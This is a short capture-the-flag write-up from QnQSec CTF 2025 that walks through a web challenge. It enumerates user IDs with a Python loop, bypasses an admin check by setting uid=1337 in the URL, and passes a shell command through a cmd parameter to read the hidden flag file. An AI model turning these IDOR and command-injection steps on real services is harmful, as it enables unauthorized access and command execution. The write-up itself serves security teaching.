Easy Web - Daryx Writeups

162 words

1 minute

Easy Web

2025-01-12

QnQSec CTF 2025

Web

/

IDOR

/

Command Injection

Reconnaissance#

Analyzing the Dockerfile#

1
RUN mkdir -p /app/.hidden && \
2
    mv /app/flag.txt /app/.hidden/flag-$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1).txt

The flag is in /app/.hidden/ with a randomized filename. We can use wildcards: /app/.hidden/flag*

Exploring the Web Application#

Found a /profile endpoint with a uid parameter. Testing uid=1 returns a user, uid=2 returns “not found”.

Finding the Admin User#

I wrote a Python script to enumerate UIDs:

1
for uid in range(1, 10000):
2
    response = requests.get(f'/profile?uid={uid}')
3
    if 'admin' in response.text.lower():
4
        print(f'Admin found with uid {uid}')
5
        break

Result: Admin found with uid 1337

The Admin Portal#

The admin portal at /profile?uid=1337 has a link to an admin command interface with an input field (default: whoami) that outputs nobody.

This looks like command execution! However, trying to change commands returns “Access denied” because the form changes the UID to 2.

Exploitation - IDOR#

The vulnerability is clear:

The admin portal checks if uid has admin privileges
But the uid parameter is client-controlled via the URL
We can manually set uid=1337 to bypass the check!

Final Exploit URL#

1
/admin?uid=1337&cmd=cat%20/app/.hidden/flag*

Flag#

1
QnQSec{I_f0und_th1s_1day_wh3n_I_am_using_sch00l_0j}

Easy Web

https://daryx.vercel.app/posts/qnqsec-2025-easy-web/

Author

Daryx

Published at

2025-01-12

License

CC BY-NC-SA 4.0

AirSpeed

Mandatory RSA

1

Reconnaissance

Analyzing the Dockerfile

Exploring the Web Application

2

Finding the Admin User